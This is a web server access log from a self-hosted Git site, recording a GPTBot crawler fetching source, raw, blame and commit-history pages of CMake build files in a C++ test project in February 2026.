"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11022] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16047] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10073] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12008] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9953] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11021] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:15:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:15:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16404] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10072] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11268] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39742] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16050] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14307] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39744] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16402] [Gzip 12.59] [Sent-to 192.168.0.250] 